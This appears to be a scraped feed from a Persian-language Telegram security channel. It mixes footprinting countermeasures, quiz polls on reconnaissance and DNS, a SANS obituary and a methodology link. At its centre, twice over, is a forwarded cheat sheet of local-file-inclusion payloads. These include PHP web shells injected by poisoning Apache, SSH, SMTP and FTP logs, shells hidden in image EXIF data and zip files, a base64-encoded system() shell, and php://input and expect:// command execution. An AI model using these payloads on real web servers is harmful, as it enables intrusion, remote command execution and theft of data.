Footprinting Countermeasures
اقداماتی برای جلوگیری از Footprinting :
در زیر برخی از متداول ترین اقدامات متقابل برای محافظت از شما آورده شده است .
سازمان ها و کارکنان از malicious footprinting :
• آموزش کاربران را برای ایمن ماندن آنلاین ارائه دهید. در گذشته، بسیاری از شرکت ها کارمندان را از دسترسی به شبکه و سایتهای شبکههای اجتماعی محدود میکند . با این حال، امروزه از سایت های شبکه های اجتماعی به عنوان بازاریابی استفاده می شود
ابزار و برای تجارت ضروری شده اند. به همین دلیل آموزش کاربران در
برخی موارد بهتر از مسدود کردن کامل سایت های شبکه های اجتماعی است.
• سرورهای وب را برای جلوگیری از نشت اطلاعات پیکربندی کنید.
• آموزش کارمندان برای استفاده از نام مستعار در وبلاگ ها، گروه ها و انجمن ها.
• از افشای اطلاعات مهم در بیانیه های مطبوعاتی، گزارش های سالانه، محصول خودداری کنید کاتالوگ و غیره
• به عنوان یک هکر اخلاقی، از تکنیک های ردپا برای کشف و حذف هر کدام استفاده کنید اطلاعات حساس در مورد شرکت و سیستم های شما که در دسترس عمومی است .
• به موتورهای جستجو اجازه ندهید که وب سایت های شما را در حافظه پنهان ذخیره کنند و از آنها به صورت ناشناس استفاده کنید خدمات ثبت نام.
• سیاست های امنیتی را برای تنظیم اطلاعاتی که کاربران شما می توانند فاش کنند، اعمال کنید به اشخاص ثالث
• DNS داخلی و خارجی جداگانه را پیکربندی کنید یا از تقسیم DNS و محدود کردن استفاده کنید
انتقال منطقه به سرورهای مجاز
• لیست دایرکتوری ها را در سرورهای وب غیرفعال کنید.
• به کاربران در مورد خطرات مهندسی اجتماعی آموزش دهید.
• برای استفاده از خدمات حفظ حریم خصوصی در پایگاه داده Whois Lookup مشترک شوید.
• از ایجاد ارتباط متقابل در سطح دامنه برای دارایی های حیاتی جلوگیری کنید.
#Footprinting
@TryHackBox
اقداماتی برای جلوگیری از Footprinting :
در زیر برخی از متداول ترین اقدامات متقابل برای محافظت از شما آورده شده است .
سازمان ها و کارکنان از malicious footprinting :
• آموزش کاربران را برای ایمن ماندن آنلاین ارائه دهید. در گذشته، بسیاری از شرکت ها کارمندان را از دسترسی به شبکه و سایتهای شبکههای اجتماعی محدود میکند . با این حال، امروزه از سایت های شبکه های اجتماعی به عنوان بازاریابی استفاده می شود
ابزار و برای تجارت ضروری شده اند. به همین دلیل آموزش کاربران در
برخی موارد بهتر از مسدود کردن کامل سایت های شبکه های اجتماعی است.
• سرورهای وب را برای جلوگیری از نشت اطلاعات پیکربندی کنید.
• آموزش کارمندان برای استفاده از نام مستعار در وبلاگ ها، گروه ها و انجمن ها.
• از افشای اطلاعات مهم در بیانیه های مطبوعاتی، گزارش های سالانه، محصول خودداری کنید کاتالوگ و غیره
• به عنوان یک هکر اخلاقی، از تکنیک های ردپا برای کشف و حذف هر کدام استفاده کنید اطلاعات حساس در مورد شرکت و سیستم های شما که در دسترس عمومی است .
• به موتورهای جستجو اجازه ندهید که وب سایت های شما را در حافظه پنهان ذخیره کنند و از آنها به صورت ناشناس استفاده کنید خدمات ثبت نام.
• سیاست های امنیتی را برای تنظیم اطلاعاتی که کاربران شما می توانند فاش کنند، اعمال کنید به اشخاص ثالث
• DNS داخلی و خارجی جداگانه را پیکربندی کنید یا از تقسیم DNS و محدود کردن استفاده کنید
انتقال منطقه به سرورهای مجاز
• لیست دایرکتوری ها را در سرورهای وب غیرفعال کنید.
• به کاربران در مورد خطرات مهندسی اجتماعی آموزش دهید.
• برای استفاده از خدمات حفظ حریم خصوصی در پایگاه داده Whois Lookup مشترک شوید.
• از ایجاد ارتباط متقابل در سطح دامنه برای دارایی های حیاتی جلوگیری کنید.
#Footprinting
@TryHackBox
Forwarded from F.P.W Library Sec [ CyberSecurity Book ] (#M)
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target
.com
/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
———————————————————
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://
/show.php?page=expect://ls
———————————————————
12. input://
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————
@TryHackBox
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
———————————————————
2. SSH Log Poisoning
ssh '<?php system($_GET['c'])?>'@target
.com
/show.php?file=/var/log/auth.log&c=ls
———————————————————
3. SMTP Log Poisoning
telnet target(.)com 25
MAIL FROM:<email@gmail.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
———————————————————
4. Image Upload
i. Add this to EXIF data of s.png: <?php system($_GET['c'])?>
ii. Upload the s.png.
iii. /show.php?file=../img/s.png&c=ls
———————————————————
5. /proc/self/environ
GET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
If no success then try writing files.
———————————————————
6. php://filter
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding
———————————————————
7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
———————————————————
8. data://text/plain:
/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
———————————————————
9. /proc/self/fd/{id}
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
———————————————————
10. /proc/$PID/fd/$FD
i. Upload a lot of shells.
ii. /show.php?file=/proc/$PID/fd/$FD
———————————————————
11. expect://
/show.php?page=expect://ls
———————————————————
12. input://
POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
———————————————————
13. RCE via vulnerable assert statement
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
———————————————————
14. Log files:
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)
———————————————————
15. Via PHP sessions
https://t.co/X18JJhXhGU?amp=1
———————————————————
16. vsftpd Log Poisoning:
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
———————————————————
17. To automate, Use LFISuite.
——————————————————
@TryHackBox
Forwarded from Try Hack Box
Forwarded from Network Penetration Testing
Thick Client Penetration Testing Methodology
https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology
#RedTeam
#pentest
@Network_PenetrationTesting
https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology
#RedTeam
#pentest
@Network_PenetrationTesting
آلن پالر، موسس صنعت امنیت سایبری titan و موسسه SANS، درگذشت
آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفهای آموزش امنیت سایبری را که هر ساله بیش از 40000 فنآور امنیت سایبری را آموزش میدهد، در سال 1989 تأسیس کرد.
ادامه شو میتونید از طریق لینک زیر مطالعه کنید :
https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html
Or
https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/
@TryHackBox
آقای پالر در صنعت امنیت سایبری پیشگام بود و از نیاز به آموزش و دانش بیشتر برای پزشکان دفاع می کرد. ترکیبی از اشتیاق، عقل، و سختگیری اخلاقی او در آوردن افراد ماهرتر به این حرفه مؤثر بود. او SANS، یک سازمان حرفهای آموزش امنیت سایبری را که هر ساله بیش از 40000 فنآور امنیت سایبری را آموزش میدهد، در سال 1989 تأسیس کرد.
ادامه شو میتونید از طریق لینک زیر مطالعه کنید :
https://www.prnewswire.com/news-releases/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away-301422382.html
Or
https://www.sans.org/press/announcements/alan-paller-cyber-security-industry-titan-and-sans-institute-founder-passes-away/
@TryHackBox
🕊1
کدام یک از موارد زیر بهترین انتخاب برای Footprinting است
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
URL ها و اطلاعات سیستم عامل از یک هدف محدود شده است؟
Anonymous Quiz
40%
15%
42%
Netcraft
4%
Yesware
کدام یک از موارد زیر شامل مجموعه ای از پایگاه های داده در دسترس عموم است
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
که حاوی اطلاعات تماس ثبت نام دامنه هستند؟
Anonymous Quiz
15%
IETF
13%
IANA
72%
Whois
0%
OSRF
Try Hack Box
Photo
یک رکورد SOA جمع آوری شده از یک انتقال منطقه در اینجا نشان داده شده است (عکس بالا).
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
نام سرور DNS معتبر برای دامنه چیست و
سرورهای ثانویه هر چند وقت یک بار برای به روز رسانی بررسی می کنند؟
Anonymous Quiz
79%
DNSRV1.anycomp.com, هر 3600 ثانیه
7%
DNSRV1.anycomp.com, هر 600 ثانیه
3%
DNSRV1.anycomp.com, هر 4 ثانیه
10%
postmaster.anycomp.com, هر 600 ثانیه
یک همکار امنیتی در مورد یک حادثه اخیر گیج شده است. یک مهاجم با موفقیت به یک دستگاه در سازمان دسترسی پیدا کرد و با آن خارج شد
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟
#Questions
برخی از داده های حساس اسکن کامل آسیب پذیری بلافاصله اجرا شد پس از سرقت چیزی کشف نشد. کدام یک از آنچه که ممکن است اتفاق افتاده باشد را به بهترین نحو توصیف می کند؟
#Questions
از کدام ابزار یا تکنیک Footprinting می توان برای یافتن نام و آدرس کارمندان یا نقاط فنی تماس استفاده کرد ؟
Anonymous Quiz
68%
whois
7%
nslookup
12%
dig
12%
traceroute
کدام هک گوگل تمام صفحاتی را که کلمات SQL و Version را در عنوان خود دارند نمایش می دهد؟
Anonymous Quiz
29%
inurl:SQL inurl:version
15%
allinurl:SQL version
17%
innoscript:SQL inurl:version
39%
allinnoscript:SQL version
کدام برنامه OSRF بررسی می کند تا ببیند نام کاربری وجود داشته است یا خیر
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
در حداکثر 22 ارائه دهنده مختلف ایمیل ثبت نام کرده اید؟
Anonymous Quiz
57%
20%
0%
23%
یک پنتستر در حال تلاش برای استفاده از nslookup است و ابزار را در حالت تعاملی برای جستجو دارد. برای درخواست رکوردهای مناسب از کدام دستور باید استفاده کرد؟
Anonymous Quiz
38%
request type=ns
7%
transfer type=ns
10%
locate type=ns
45%
set type=ns
آیا بحث Reconnaissance متوجه شدید؟
( از کامنت ها هم میتونید استفاده کنید )
( از کامنت ها هم میتونید استفاده کنید )
Anonymous Poll
61%
بله
21%
خیر
18%
متوسط
سلام دوستان در کامنت بنویسید چه دوره هایی را گذروندید یا در حال گذراندن آن هستید میخوام بدونم پست ها رو در چه سطحی ببرم پس نظر بدید . با احترام مدیر کانال unique exploit
مخفف arp چیست ؟
Anonymous Quiz
13%
Address reply protocol
33%
Address request protocol
44%
Address resolution protocol
10%
1 , 2